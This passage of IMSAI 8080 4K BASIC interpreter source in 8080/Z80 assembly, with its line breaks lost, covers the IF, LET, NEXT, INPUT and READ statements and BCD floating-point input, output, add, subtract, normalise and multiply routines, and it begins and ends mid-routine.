LEFT EXPRESSION PUSH HL ;SAVE HL LD HL,TVAR1 ;GET ADDR OF TEMP STORAGE RST RST6 ;SAVE IT POP HL ;RESTORE HL XOR A ;CLEAR A LD C,A ;SAVE IN REG C LD B,A ;INIT REG IFREL LD A,(HL) ;GET OPERATOR INC B ;COUNT CP '=' ;TEST FOR EQUAL JP NZ,IFEQ ;BRIF IT IS INC C ;ADD 1 TO C INC HL ;POINT NEXT IFEQ CP '>' ;TEST FOR GREATER THAN JP NZ,IFGT ;BRIF IT IS INC C ;ADD TWO INC C ;TO REL CODE INC HL ;POINT NEXT IFGT CP '<' ;TEST FOR LESS THAN JP NZ,IFLT ;BRIF IT IS LD A,C ;GET REL CODE ADD A,4 ;PLUS FOUR LD C,A ;PUT BACK INC HL ;POINT NEXT IFLT LD A,C ;GET REL CODE OR A ;TEST IT JP Z,SNERR ;BRIF SOME ERROR LD (REL),A ;SAVE CODE LD A,B ;GET COUNT CP 2 ;TEST FOR TWO JP NZ,IFREL ;SEE IF MULTIPLE RELATION CALL EXPR ;GO EVALUATE RIGHT SIDE PUSH HL ;SAVE STMT LOCATION LD HL,TVAR1 ;POINT LEFT CALL FSUB ;SUBTRACT LEFT FROM RIGHT POP HL ;RESTORE STMT ADDR LD A,(REL) ;GET RELATION RRA ;TEST BIT D0 JP NC,IFNOT ;BRIF NO EQUAL TEST CALL FTEST ;GET SIGN OF DIFFERENCE JP Z,TRUE ;BRIF LEFT=RIGHT IFNOT LD A,(REL) ;LOAD RELATION AND 02H ;MASK IT JP Z,IFNTX ;BRIF NO > CALL FTEST ;GET SIGN OF DIFFERENCE JP M,TRUE ;BRIF GT IFNTX LD A,(REL) ;LOAD RELATION AND 04H ;MASK IT JP Z,RUN ;BRIF NO < CALL FTEST ;GET SIGN OF DIFFERENCE JP M,RUN ;BRIF GT JP Z,RUN ;BRIF EQUAL TRUE LD DE,THENL ;GET ADDR 'THEN' RST RST2 ;GO COMPARE JP NZ,SNERR ;BRIF ERROR JP GOTO ;BRIF IT IS *HEADING IMSAI 8080 4K BASIC LET EQU $ ; ; ; STMT: :LET: VAR = EXPR ; ; CALL VAR ;NEXT MUST BE VARIABLE NAME CP '=' ;TEST FOR EQUAL SIGN JP NZ,SNERR ;BRIF MISSING EQUAL CALL SEARC ;GO FIND ADDRESS OF VAR PUSH DE ;SAVE ADDRESS INC HL ;POINT NEXT CALL EXPR ;GO EVALUATE EXPRESSION POP HL ;RESTORE ADDRESS RST RST6 ;GO STORE VARIABLE JP RUN ;CONTINUE *HEADING IMSAI 8080 4K BASIC NEXT EQU $ ; ; ; STMT: NEXT VAR ; ; CALL VAR ;GET VARIABLE NAME EX DE,HL ;FLIP/FLOP LD (INDX),HL ;SAVE VAR NAME PUSH HL ;SAVE VAR NAME LD HL,FORNE ;POINT FOR/NEXT TABLE LD B,(HL) ;GET SIZE LD A,B ;LOAD IT OR A ;TEST IT JP Z,NXERR ;BRIF TABLE EMPTY INC HL ;POINT NEXT POP DE ;RESTORE VAR NAME NXLP LD A,(HL) ;GET 1ST BYTE INC HL ;POINT NEXT CP D ;COMPARE JP NZ,NXNE ;BRIF NOT EQUAL LD A,(HL) ;GET 2ND BYTE CP E ;COMPARE JP Z,NXEQ ;BRIF EQUAL NXNE RST RST7 ;GO BUMP HL DEFB 11 ;BY ELEVEN DEC B ;DECR COUNT JP NZ,NXLP ;LOOP JP NXERR ;GO PUT ERROR MSG NXEQ LD A,(FORNE) ;GET ORIG COUNT SUB B ;MINUS REMAIN INC A ;PLUS ONE LD (FORNE),A ;STORE NEW COUNT INC HL ;POINT STEP PUSH HL ;SAVE HL ADDR CALL SEARC ;GO GET ADDR OF INDEX EX DE,HL ;PUT TO HL LD (ADDR1),HL ;SAVR IT RST RST5 ;LOAD INDEX POP HL ;GET HL (TBL) PUSH HL ;RESAVE CALL FADD ;ADD STEP VALUE LD HL,TVAR1 ;POINT NEW INDEX RST RST6 ;STORE IT POP HL ;GET HL (TBL) PUSH HL ;RESAVE RST RST7 ;GO BUMP HL DEFB 4 ;BY FOUR CALL FSUB ;SUBTRACT TO VALUE CALL FTEST ;GET SIGN OF DIFFERENCE JP Z,NXTZR ;BRIF ZERO POP HL ;GET HL (PTR TO STEP) PUSH HL ;RE-SAVE LD A,(HL) ;GET SIGN & EXPONENT OF STEP OR A ;TEST IT LD A,(FACC) ;GET SIGN & EXPONENT OF DIFFERENCE JP M,NXTNE ;BRIF NEGATIVE NXTPO OR A ;TEST IT JP M,NXTZR ;BRIF LESS THAN TO-EXPR JP NEXTZ ;GO PAST NEXT NXTNE OR A ;TEST IT JP M,NEXTZ ;BRIF END OF LOOP NXTZR POP HL ;POP THE STACK RST RST7 ;GO BUMP HL DEFB 8 ;BY EIGHT LD D,(HL) ;GET HI BYTE INC HL ;POINT NEXT LD E,(HL) ;GET LOW BYTE EX DE,HL ;PUT TO HL LD (STMT),HL ;SAVE ADDR OF FOR LD DE,TVAR1 ;POINT UPDATED INDEX VALUE LD HL,(ADDR1) ;GET ADDR LD B,4 ;LENGTH CALL COPYD ;GO MOVE TO I JP RUN ;CONTINUE STMT AFTER FOR NEXTZ EQU $ LD HL,FORNE ;GET ADDR TABLE DEC (HL) ;SUBTRACT ONE FROM COUNT JP RUN ;GO STMT AFTER NEXT *HEADING IMSAI 8080 4K BASIC INPUT EQU $ ; ; ; STMT: INPUT VAR :, VAR, VAR: ; ; LD DE,IOBUF ;GET ADDR OF BUFFER EX DE,HL ;FLIP/FLOP LD (ADDR1),HL ;SAVE ADDR LD (HL),0 ;MARK BUFFER EMPTY EX DE,HL ;FLIP/BACK IN1 CALL VAR ;GO GET VAR NAME CALL SEARC ;GO ;LOOK UP ADDRESS PUSH HL ;SAVE HL ADDR PUSH DE ;SAVE VAR ADDRE LD HL,(ADDR1) ;GET ADDR PREV BUFFER LD A,(HL) ;LOAD CHAR CP ',' ;TEST IF COMMA INC HL ;POINT NEXT JP Z,IN2 ;BRIF CONTINUE FROM PREV OR A ;TEST IF END OF LINE JP NZ,SNERR ;BRIF ERROR LD A,'?' ;PROMPT CHAR CALL TERMI ;GO READ FROM TTY IN2 CALL FIN ;GO CONVERT TO FLOATING LD (ADDR1),HL ;SAVE ADDRESS POP HL ;GET VAR ADDRESS RST RST6 ;GO STORE THE NUMBER POP HL ;RESTORE STMT POINTER RST RST1 ;SKIP SPACES CP ',' ;TEST FOR COMMA INC HL ;POINT NEXT JP Z,IN1 ;RECURSIVE IF COMMA DEC HL ;POINT BACK JP RUN ;GO NEXT STMT *HEADING IMSAI 8080 4K BASIC READ EQU $ ; ; STMT: READ VAR :,VAR ...: ; CALL VAR ;GO GET VAR NAME CALL SEARC ;GO GET ADDRESS PUSH HL ;SAVE HL PUSH DE ;SAVE DE LD HL,(DATAP) ;GET DATA STMT POINTER LD A,(HL) ;LOAD THE CHAR OR A ;TEST IF END OF STMT JP NZ,NOTDT ;BRIF NOT END OF STMT INC HL ;POINT START NEXT STMT DATAN LD A,(HL) ;LOAD LEN LD (DATAP),HL ;SAVE ADDR OR A ;TEST IF END OF PGM JP Z,DAERR ;BRIF OUT OF DATA INC HL ;POINT NEXT LD (DASTM),HL ;SAVE ADDR OF LINE NUMBER INC HL ;SKIP LINE NUMBER INC HL ;POINT 1ST DATA BYTE RST RST1 ;SKIP BLANKS LD DE,DATAL ;POINT 'DATA' RST RST2 ;COMPARE JP Z,NOTDT ;BRIF IT IS DATA STMT LD HL,(DATAP) ;GET ADDR START LD E,(HL) ;GET LEN CODE LD D,0 ;CLEAR D ADD HL,DE ;POINT NEXT STMT JP DATAN ;LOOP NEXT STMT NOTDT CALL FIN ;GO CONVERT VALUE LD A,(HL) ;GET CHAR WHICH STOPPED US CP ',' ;TEST IF COMMA JP NZ,NOTCO ;BRIF NOT INC HL ;POINT NEXT DATOK LD (DATAP),HL ;SAVE ADDRESS POP HL ;RESTORE ADDR OF VAR RST RST6 ;STORE THE VALUE POP HL ;RESTORE POINTER TO STM LD A,(HL) ;LOAD THE CHAR CP ',' ;TEST IF COMMA INC HL ;POINT NEXT JP Z,READ ;RECURSIVE IF IT IS DEC HL ;RESET JP RUN ;CONTINUE NOTCO OR A ;TEST IF END OF STMT JP Z,DATOK ;BRIF OK LD HL,(DASTM) ;GET DATA STMT LINE NUMBER LD (LINE),HL ;SAVE IN LINE NUMBER JP SNERR ;GO PROCESS ERROR ; *HEADING IMSAI 8080 4K BASIC FIN EQU $ ; ;FLOATING POINT INPUT CONVERSION ROUTINE ; ;THIS SUBROUTINE CONVERTS AN ASCII STRING OF CHARACTERS TO ;POINT ACCUMULATOR. THE INPUT FIELD MAY CONTAIN ANY VALID ;INCLUDING SCIENTIFIC (NNN.NNNNE+NN) ;THE INPUT STRING IS TERMINATED BY ANY NON-NUMERIC CHARACT ; ; EX DE,HL ;FLIP/FLOP DE HL LD HL,FACC ;POINT TO FACC LD B,4 ;LOOP CTR CALL ZEROM ;GO CLEAR THE FACC RST RST7 ;GO BUMP HL DEFB -4 ;BY NEG FOUR LD C,B ;INIT DIGIT COUNTER LD A,(DE) ;GET FIRST BYTE CP '+' ;TEST FOR PLUS SIGN JP Z,FIN2 ;BRIF IS CP '-' ;TEST FOR MINUS SIGN JP NZ,FIN3 ;BRIF NOT LD (HL),80H ;SET MINUS MANTISSA FIN2 INC DE ;POINT NEXT DIGIT LD A,(DE) ;GET THE BYTE FIN3 CP '0' ;TEST FOR LEADING ZERO JP Z,FIN2 ;BRIF IT IS FIN4 CP '9'+1 ;TEST FOR NINE JP NC,FIN14 ;BRIF NOT NUMERIC CP '0' ;TEST FOR ZERO JP C,FIN5 ;BRIF NOT NUMERIC INC B ;COUNT EXPONENT CALL FIN9 ;STORE THE DIGIT INC DE ;POINT NEXT LD A,(DE) ;GET THE DIGIT JP FIN4 ;LOOP FIN5 CP '.' ;TEST FOR DOT JP NZ,FIN19 ;BRIF NOT LD A,C ;GET DIGIT COUNT OR A ;TEST FOR ZERO JP NZ,FIN7 ;BRIF NOT FIN6 INC DE ;POINT NEXT LD A,(DE) ;GET DIGIT CP '0' ;TEST FOR ZERO JP NZ,FIN8 ;BRIF NOT DEC B ;COUNT IT JP FIN6 ;LOOP FIN7 INC DE ;POINT NEXT LD A,(DE) ;GET THE DIGIT FIN8 CP '0' ;TEST FOR ZERO JP C,FIN19 ;BRIF LOWER CP '9'+1 ;TEST FOR NINE JP NC,FIN14 ;BRIF HIGH CALL FIN9 ;GO STORE DIGIT JP FIN7 ;LOOP FIN9 LD A,C ;GET DIGIT COUNT CP 6 ;TEST FOR MAX RET Z ;RETURN IF EQUAL INC A ;ADD ONE LD C,A ;REPLACE PREV COUNT INC A ;PLUS ONE RRA ;DIVIDE BY TWO AND 0FH ;MASK OFF UNUSED BITS ADD A,L ;PLUS LOW BYTE OF H LD L,A ;REPLACE LOW BYTE OF HL LD A,C ;RE-LOAD DIGIT COUNT RRA ;TEST EVEN/ODD LD A,(DE) ;GET THE DIGIT JP C,FIN12 ;BRIF ODD DIGIT AND 0FH ;LOW 4 BITS ONLY OR (HL) ;GET HIGH 4 BITS JP FIN13 ;GO RETURN FIN12 RST RST4 ;SHIFT LEFT FIN13 LD (HL),A ;REPLACE LD HL,FACC ;POINT TO FACC RET ;RETURN FIN14 CP 'E' ;TEST FOR EXPLICIT EXPONENT JP NZ,FIN19 ;BRIF NOT EQUAL INC DE ;POINT NEXT LD A,(DE) ;GET DIGIT LD C,0 ;CLEAR COUNTER CP '+' ;TEST FOR PLUS JP Z,FIN17 ;BRIF EQUAL CP '-' ;TEST FOR MINUS JP NZ,FIN16 ;BRIF NOT EQUAL CALL FIN15 ;GET NUMERIC EXPONENT LD A,C ;LOAD THE NUMBER CPL ;COMPLEMENT INC A ;PLUS ONE (TWOS COMPLEMENT) JP FIN18 ;CONTINUE FIN15 INC DE ;POINT NEXT LD A,(DE) ;GET DIGIT CP '0' ;TEST ZERO RET C ;RETURN IF ERROR CP '9'+1 ;TEST NINE RET NC ;RETURN IF NOT NUMERIC LD A,C ;GET PRIOR ADD A,A ;TIMES TWO LD C,A ;SAVE ADD A,A ;TIMES FOUR ADD A,A ;TIMES EIGHT ADD A,C ;TIMES TEN LD C,A ;SAVE LD A,(DE) ;GET THIS DIGIT AND 0FH ;MASK OFF HIGH FOUR BITS ADD A,C ;PLUS PREV*10 LD C,A ;SAVE JP FIN15 ;LOOP FIN16 DEC DE ;POINT PRIOR TEMP FIN17 CALL FIN15 ;GO GET NUMERIC EXPONENT LD A,C ;LOAD THE EXPONENT FIN18 ADD A,B ;PLUS COMPUTED EXPONENT LD B,A ;SAVE IT LD A,(DE) ;GET LAST CHAR FIN19 INC HL ;POINT 1ST DIGIT LD A,(HL) ;LOAD OR A ;TEST IF ZERO JP Z,FIN20 ;BRIF ZERO DEC HL ;POINT EXPONENT DEC B ;SUB ONE FROM EXPONENT LD A,B ;GET EXPONENT AND 7FH ;TURN OFF HIGH BIT OR (HL) ;OR IN MANTISSA SIGN LD (HL),A ;STORE IN FACC XOR A ;TURN CY OFF, CLEAR ACC FIN20 EX DE,HL ;FLIP/FLOP RET ;RETURN *HEADING IMSAI 8080 4K BASIC FOUT EQU $ ; ;FLOATING POINT OUTPUT FORMAT ROUTINE ; ;THIS SUBROUTINE CONVERTS A NUMBER IN THE FLOATING POINT AC ;TO A FORMAT SUITABLE FOR PRINTING. THAT IS, THE NUMBER WIL ;SCIENTIFIC NOTATION (+N.NNNNNE+NN) IF THE EXPONENT IS > 5 ;OTHERWISE IT WILL BE ZERO SUPPRESSED BOTH ON THE LEFT OF T ;PORTION AND ON THE RIGHT OF THE FRACTION. ; LD DE,FACC ;POINT TO FLOATING POINT ACCUMULATOR LD A,(DE) ;GET EXPONENT BYTE LD C,A ;SAVE IT RLA ;SHIFT (TEST MANTISSA SIGN) LD (HL),' ' ;DEFAULT POSITIVE JP NC,FOUT1 ;BRIF POSITIVE LD (HL),'-' ;MOVE DASH FOUT1 INC DE ;POINT TO FIRST & SECOND DIGITS INC HL ;AND NEXT OUTPUT POSITION LD A,(DE) ;PUT TO ACC CALL RIGHT ;SHIFT RIGHT OR '0' ;DECIMAL ZONE LD (HL),A ;PUT OUT INC HL ;POINT NEXT OUT LD (HL),'.' ;MOVE DECIMAL POINT LD B,3 ;INIT LOOP COUNTER JP FOUT3 ;JUMP INTO MIDDLE OF LOOP FOUT2 INC HL ;POINT NEXT OUT INC DE ;NEXT 2 DIGITS LD A,(DE) ;GET HIGH & LOW CALL RIGHT ;SHIFT RIGHT OR '0' ;DECIMAL ZONE LD (HL),A ;PUT TO OUTPUT FOUT3 INC HL ;POINT NEXT OUTPUT LD A,(DE) ;GET DIGITS AGAIN AND 0FH ;MASK OFF HIGH OR '0' ;DECIMAL ZONE LD (HL),A ;PUT TO OUTPUT DEC B ;TEST LOOP COUNTER JP NZ,FOUT2 ;BRIF MORE INC HL ;POINT NEXT OUTPUT LD (HL),'E' ;MOVE LIT E INC HL ;POINT NEXT LD A,C ;GET EXPONENT BYTE AND 3FH ;MASK OFF SIGNS LD B,A ;SAVE IN B LD A,C ;GET EXPONENT BYTE RLA ;IGNORE MANTISSA SIGN RLA ;TEST EXPONENT SIGN LD (HL),'+' ;DEFAULT POSITIVE JP NC,FOUT4 ;BRIF POSITIVE LD (HL),'-' ;ELSE MOVE DASH LD A,C ;RELOAD EXPONENT BYTE OR 0C0H ;SET ALL ON CPL ;COMPLEMENT ACC INC A ;PLUS 1 (TWOS COMPLEMENT) LD B,A ;SAVE IN B FOUT4 INC HL ;POINT NEXT OUT LD A,B ;GET EXPONENT LD B,2FH ;INIT COUNTER FOUT5 SUB 10 ;SUBTRACT 10 INC B ;COUNT 1 JP NC,FOUT5 ;BRIF NOT NEG LD (HL),B ;POINT TO OUTPUT INC HL ;POINT NEXT ADD A,58 ;ADJUST LD (HL),A ;MOVE 2ND DIGIT LD A,C ;GET EXPONENT RLA ;SHIFT OFF MANTISSA SIGN OR A ;TEST JP P,FOUT6 ;BRIF POSITIVE SCF ;SET CY RRA ;SHIFT BACK CP -2 ;TEST FOR MIN RET C ;RETURN IF LESS THAN -2 JP FOUT7 ;GO AROUND FOUT6 RRA ;SHIFT BACK CP 6 ;TEST IF TOO BIG RET NC ;RETURN IF 6 OR GREATER FOUT7 LD C,A ;SAVE EXPONENT LD B,4 ;CTR FOUT8 LD (HL),' ' ;SPACE OUT EXPONENT DEC HL ;POINT PRIOR DEC B ;DECR CTR JP NZ,FOUT8 ;LOOP EX DE,HL ;FLIP/FLOP LD A,E ;GET LOW BYTE SUB 5 ;POINT TO DOT LD L,A ;PUT DOWN LD A,D ;GET HIGH SBC A,0 ;IN CASE OF BORROW LD H,A ;PUT DOWN LD A,C ;GET EXPONENT OR A ;TEST SIGN JP Z,FOX1 ;BRIF ZERO JP M,FOX2 ;BRIF NEGATIVE FOUT9 LD B,(HL) ;GET HIGH BYTE INC HL ;POINT NEXT LD A,(HL) ;GET LOW BYTE LD (HL),B ;SHIFT DOT TO RIGHT DEC HL ;POINT BACK LD (HL),A ;MOVE THE DIGIT LEFT INC HL ;POINT NEXT DEC C ;DECR CTR JP NZ,FOUT9 ;LOOP FOX1 EX DE,HL ;POINT END FOX3 LD A,(HL) ;GET A DIGIT/DOT CP '0' ;TEST FOR A TRAILING ZERO JP NZ,FOX4 ;BRIF NOT LD (HL),' ' ;SPACE FILL DEC HL ;POINT PRIOR JP FOX3 ;LOOP FOX4 CP '.' ;TEST FOR TRAILING DOT RET NZ ;RETURN IF NOT LD (HL),' ' ;SPACE IT OUT DEC HL ;POINT PRIOR RET ;RETURN FOX2 CP 0FFH ;TEST IF -1 JP NZ,FOX5 ;ELSE -2 DEC HL ;POINT SIGNIFICANT LD A,(HL) ;GET THE CHAR LD (HL),'.' ;MOVE THE DOT INC HL ;POINT NEXT LD (HL),A ;SHIFT THE DIGIT JP FOX1 ;GO ZERO SUPPRESS FOX5 DEC HL ;POINT ONE TO LEFT LD A,(HL) ;PICK UP DIGIT LD (HL),'0' ;REPLACE INC HL ;POINT RIGHT LD (HL),A ;PUT THE DIGIT LD H,D ;GET LOW ADDR LD L,E ;POINT LAST DIGIT LD B,6 ;CTR FOX6 DEC HL ;POINT PRIOR LD A,(HL) ;GET A DIGIT INC HL ;POINT LD (HL),A ;PUT IT ONE TO RIGHT DEC HL ;POINT DEC B ;DECR CTR JP NZ,FOX6 ;LOOP LD (HL),'.' ;MOVE THE DOT JP FOX1 ;CONTINUE *HEADING IMSAI 8080 4K BASIC FADD EQU $ ; ; ;FLOATING POINT ADD THE NUMBER AT (HL) TO THE FACC ; ; INC HL ;POINT FIRST DIGIT LD A,(HL) ;LOAD IT OR A ;TEST IT RET Z ;RETURN IF ZERO DEC HL ;POINT BACK CALL FTEST ;GO TEST SIGN OF FACC JP Z,RST5 ;JUST LOAD IF FACC = 0 LD DE,FACC ;POINT FACC LD A,(DE) ;GET EXPONENT OF FACC CALL FEXP ;GO GET EXPONENT LD B,A ;SAVE EXPONENT LD A,(HL) ;GET EXPONENT OF ADDR CALL FEXP ;GO GET EXPONENT LD C,A ;SAVE THE EXPONENT SUB B ;GET DIFFERENCE OF TWO EXPONENTS JP Z,FADD4 ;BRIF THEY'RE EQUAL JP P,FADD3 ;BRIF DIFFERENCE IS POSITIVE CPL ;COMPLEMENT ACC INC A ;PLUS ONE (TWO'S COMPLEMENT) FADD3 CP 6 ;COMPARE DIFFERENCE TO SIX JP C,FADD4 ;BRIF 5 OR LESS LD A,B ;GET EXPON OF ADDUEND SUB C ;GET TRUE DIFFERENCE AGAIN RET P ;RETURN IF FACC > ADDER JP RST5 ;ELSE, ADDER > FACC FADD4 PUSH AF ;SAVE DIFFERENCE PUSH BC ;SAVE EXPONENTS LD DE,FTEMP ;GET ADDR OF TEMP ACC LD B,4 ;FOUR BYTES CALL COPYH ;GO COPY POP BC ;GET EXPONENTS POP AF ;GET DIFFERENCE JP Z,FADD9 ;JUST ADD IF ZERO LD HL,FTEMP+1 ;DEFAULT PUSH AF ;SAVE DIFFERENCE LD A,B ;GET FACC EXPON SUB C ;MINUS FTEMP EXPON JP P,FADD6 ;BRIF TEMP MUST BE SHIFTED LD HL,FACC ;POINT FLOAT ACC LD A,C ;GET EXPONENT, SIGN AND 7FH ;STRIP EXP SIGN LD C,A ;PUT BACK LD A,(HL) ;GET THE EXP AND 80H ;STRIP OFF OLD EXPON OR C ;MOVE ADDER EXPON TO IT LD (HL),A ;REPLACE INC HL ;POINT FIRST DATA BYTE FADD6 POP AF ;GET DIFFER LD C,A ;SAVE IT FADD7 LD B,3 ;LOOP CTR (INNER) LD D,0 ;INIT CARRY OVER TO ZERO PUSH HL ;SAVE ADDR CALL FSHFT ;GO SHIFT POP HL ;GET ADDR DEC C ;DECR CTR JP NZ,FADD7 ;LOOP FADD9 EQU $ LD DE,FACC ;POINT SIGN OF ADDUEND LD HL,FTEMP ;AND SIGN OF ADDER LD A,(DE) ;GET SIGN OF ADDUEND XOR (HL) ;COMPARE THE TWO SIGNS JP M,FADD1 ;BRIF SIGNS DIFFER LD DE,FACC+3 ;POINT LOW END LD HL,FTEMP+3 ;DITTO LD B,3 ;THREE BYTES CALL FADDT ;GO ADD TWO TOGETHER RET NC ;RETURN IF NO CARRY FADX1 LD HL,FACC ;GET ADDR OF ACC LD A,(HL) ;LOAD THE EXPON AND 80H ;ISOLATE SIGN LD B,A ;SAVE SIGN LD A,(HL) ;GET EXPON CALL FEXP ;GO GET EXPONENT INC A ;ADD ONE AND 7FH ;ISOLATE OR B ;PUT BACK SIGN LD (HL),A ;PUT IT DOWN INC HL ;POINT DATA LD D,10H ;(THE CARRY) LD B,3 ;CTR CALL FSHFT ;GO SHIFT IT RET ;RETURN FADD1 EQU $ LD HL,FTEMP+4 ;POINT TEMP2 AREA LD B,4 ;PREPARE TO SAVE ACC CALL COPYD ;GO COPY FADX2 LD DE,FACC+3 ;POINT LOW ACC LD HL,FTEMP+3 ;AND LOW TEMP LD B,3 ;CTR CALL FSUBT ;GO SUBTRACT THE TWO JP NC,FNORM ;BRIF NO BORROW LD DE,FACC ;POINT ACC LD HL,FTEMP ;POINT TEMP LD B,8 ;CTR CALL COPYH ;GO COPY LD DE,FACC ;POINT LD HL,FTEMP ;TEMP LD A,(HL) ;GET ORIG ACC EXPONENT XOR 80H ;REVERSE SIGN LD (DE),A ;PUT TO NEW ACC JP FADX2 ;GO SUBTRACT AGAIN *HEADING IMSAI 8080 4K BASIC FNORM EQU $ ; ; ;NORMALIZE THE FLOATING ACCUMULATOR ;THAT IS, THE FIRST DIGIT MUST BE SIGNIFICANT ; ; LD HL,FACC+1 ;POINT TO FIRST BYTE LD A,(HL) ;LOAD IT AND 0F0H ;ISOLATE RET NZ ;RETURN IF ALREADY NORMALIZED LD A,(HL) ;GET THE BYTE INC HL ;POINT NEXT OR (HL) ;OR THE NEXT BYTE INC HL ;POINT LAST OR (HL) ;OR THAT BYTE (ACC HAS LOGICAL S JP NZ,FNOR1 ;BRIF NOT ZERO LD HL,FACC ;ELSE POINT FLOAT ACC LD (HL),0 ;CLEAR THE EXPONENT RET ;RETURN FNOR1 LD HL,FACC+3 ;POINT LST BYTE LD B,3 ;3 BYTE LOOP LD D,0 ;INIT CARRY OVER FNOR2 LD A,(HL) ;GET A BYTE LD C,A ;SAVE IT RST RST4 ;SHIFT LEFT 4 BITS OR D ;PLUS PREV SHIFT OUT LD (HL),A ;PUT BACK LD A,C ;GET SAVED BYTE CALL RIGHT ;SHIFT RIGHT 4 BITS LD D,A ;SAVE FOR NEXT TIME DEC HL ;POINT NEXT BYTE DEC B ;DECR CTR JP NZ,FNOR2 ;LOOP LD A,(HL) ;GET EXPONENT AND 80H ;ISOLATE SIGN LD B,A ;SAVE LD A,(HL) ;GET AGAIN CALL FEXP ;GO GET EXPONENT DEC A ;MINUS ONE AND 7FH ;TURN OFF HIGH BIT OR B ;PLUS SAVED SIGN LD (HL),A ;PUT BACK JP FNORM ;GO NORMALIZE *HEADING IMSAI 8080 4K BASIC FSUB EQU $ ; ; ;FLOATING POINT SUBTRACT THE NUMBER AT (HL) FROM THE FACC ; ; INC HL ;POINT FIRST DATA BYTE OF SUBTRA LD A,(HL) ;LOAD IT OR A ;TEST RET Z ;RETURN IF ZERO DEC HL ;POINT BACK LD DE,FTEMP ;GET TEMPORARY STORAGE AREA LD B,4 ;FOUR BYTES CALL COPYH ;GO COPY LD HL,FTEMP ;POINT NEW AREA LD A,(HL) ;GET EXPONENT XOR 80H ;REVERSE SIGN LD (HL),A ;REPLACE JP FADD ;GO ADD THE TWO *HEADING IMSAI 8080 4K BASIC FMUL EQU $ ; ; ;FLOATING POINT MULTIPLY THE NUMBER AT (HL) TO THE FACC ; ; CALL FTEST ;TEST FACC RET Z ;RETURN IF ZERO INC HL ;POINT 1ST DIGIT OF MULTIPLIER LD A,(HL) ;LOAD IT DEC HL ;RESTORE OR A ;TEST IF ZERO JP Z,RST5 ;GO LOAD TO FACC IF IT IS LD DE,FACC ;POINT EXP OF FACC LD A,(DE) ;LOAD EXPONENT OR A ;TEST IF 10 TO 0 JP NZ,FMUL1 ;BRIF NOT INC DE ;POINT NEXT LD A,(DE) ;LOAD IT CP 10H ;TEST IF 1 JP NZ,FMUL1 ;BRIF NOT INC DE ;POINT NEXT LD A,(DE) ;LOAD IT OR A ;TEST IF ZERO JP NZ,FMUL1 ;BRIF NOT INC DE ;POINT NEXT LD A,(DE) ;LOAD IT OR A ;TEST IF ZERO JP Z,RST5 ;GO LOAD IF FACC = 1.00000 FMUL1 LD DE,FACC ;POINT EXPONENT LD A,(DE) ;LOAD IT CALL FEXP ;GO GET EXPONENT LD B,A ;SAVE IN B LD A,(HL) ;GET EXPONENT OF MULTIPLIER CALL FEXP ;GO GET EXPONENT SCF ;TURN ON CY ADC A,B ;ADD EXPONENTS TOGETHER CALL FOVUN ;GO SEE IF OVERFLOW/UNDERFLOW AND 7FH ;TURN OFF SIGN LD B,A ;SAVE LD A,(DE) ;GET SIGN OF FACC XOR (HL) ;PRODUCT SIGN IS NEG IF TWO SIGN AND 80H ;MASK OR B ;PUT SIGN AND EXPONENT TOGETHER LD (DE),A ;PUT IN FACC PUSH HL ;SAVE HL LD HL,FTEMP ;POINT DIGIT 7 OF RESULT LD B,6 ;LOOP CTR CALL ZEROM ;GO ZERO 6 BYTES LD DE,FACC+1 ;POINT 1ST DIGIT OF ACC LD B,3 ;LOOP CTR FMUL5 LD A,(DE) ;GET AN ACC DIGIT PAIR LD (HL),A ;PUT TO TEMP STORAGE XOR A ;ZERO A LD (DE),A ;CLEAR ACC INC DE ;POINT NEXT INC HL ;DITTO DEC B ;DECR CTR JP NZ,FMUL5 ;LOOP LD C,6 ;OUTER LOOP CTR POP HL ;GET ADDR OF MULTIPLIER RST RST7 ;GO BUMP HL DEFB 3 ;BY THREE FMUL6 LD A,C ;GET CTR RRA ;TEST IF EVEN/ODD LD A,(HL) ;GET MULTIPLIER DIGIT PAIR JP C,FMUL7 ;BRIF LEFT NEEDED AND 0FH ;MASK JP FMUL8 ;GO AROUND FMUL7 CALL RIGHT ;SHIFT RIGHT 4 BITS FMUL8 LD B,A ;SAVE DIGIT PUSH HL ;SAVE ADDRESS PUSH BC ;SAVE COUNTERS LD C,B ;SWAP B/C OR A ;TEST MULTIPLIER JP Z,FMUX1 ;BRIF ZERO FMUL9 LD DE,FTEMP+2 ;POINT PRODUCT LD HL,FTEMP+8 ;POINT MULTIPLICAND LD B,6 ;6 DIGITS PARTICIPATE CALL FADDT ;GO ADD DEC C ;DECR OUTER LOOP CTR JP NZ,FMUL9 ;LOOP FMUX1 LD D,0 ;INIT SHIFT DIGIT LD B,6 ;LOOP CTR LD HL,FTEMP+8 ;POINT MULTIPLICAND CALL FSHFX ;GO SHIFT POP BC ;RESTORE CTRS POP HL ;ANDADDRESS DEC C ;DECR CTR JP Z,FMUX2 ;GO AROUND IF ZERO LD A,C ;LOAD THE CTR RRA ;TEST EVEN/ODD JP C,FMUL6 ;LOOP IF ODD DEC HL ;ELSE, POINT NEXT JP FMUL6 ;LOOP FMUX2 LD HL,FACC+1 ;POINT MSD OF PRODUCT LD A,(HL) ;GET MSD PAIR AND 0F0H ;ISOLATE LEFT HALF JP NZ,FMUX3 ;BRIF NORMALIZED LD B,5 ;CTR LD D,H ;COPY HL LD E,L ;TO DE FMUX4 LD A,(HL) ;GET A PAIR OF DIGITS RST RST4 ;SHIFT RIGHT TO LEFT LD C,A ;SAVE DIGIT INC HL ;POINT NEXT PAIR LD A,(HL) ;GET NEXT PAIR CALL RIGHT ;SHIFT LEFT TO RIGHT OR C ;COMBINE LD (DE),A ;PUT DOWN INC DE ;POINT NEXT OUTPUT PAIR DEC B ;DECR CTR JP NZ,FMUX4 ;LOOP LD A,(HL) ;GET LAST PAIR RST RST4 ;SHIFT LEFT LD (DE),A ;PUT DOWN LD A,(FACC) ;GET EXPON & SIGN LD C,A ;SAVE AND 80H ;ISOLATE SIGN LD B,A ;SAVE SIGN LD A,C ;GET EXPON & SIGN CALL FEXP ;GO GET EXPON DEC A ;SUBTRACT ONE AND 7FH ;STRIP 8TH BIT OR B ;MERGE IN SIGN BIT LD (FACC),A ;PUT DOWN JP FMUX2 ;CONTINUE FMUX3 LD A,(FTEMP) ;GET 1ST DIGIT PAIR FOLLOWING FA ADD A,50H ;ADD 5 DAA ;ADJUST JP NC,FNORM ;BRIF 4 OR LESS FROUN LD HL,FACC+3 ;ELSE, POINT LSD OF FACC LD B,3 ;LOOP CTR SCF ;TURN ON CY INDICATOR FMUX5 LD A,(HL) ;GET A DIGIT PAIR ADC A,0 ;ADD THE CARRY DAA ;ADJUST LD (HL),A ;PUT BACK DEC HL ;POINT NEXT DEC B 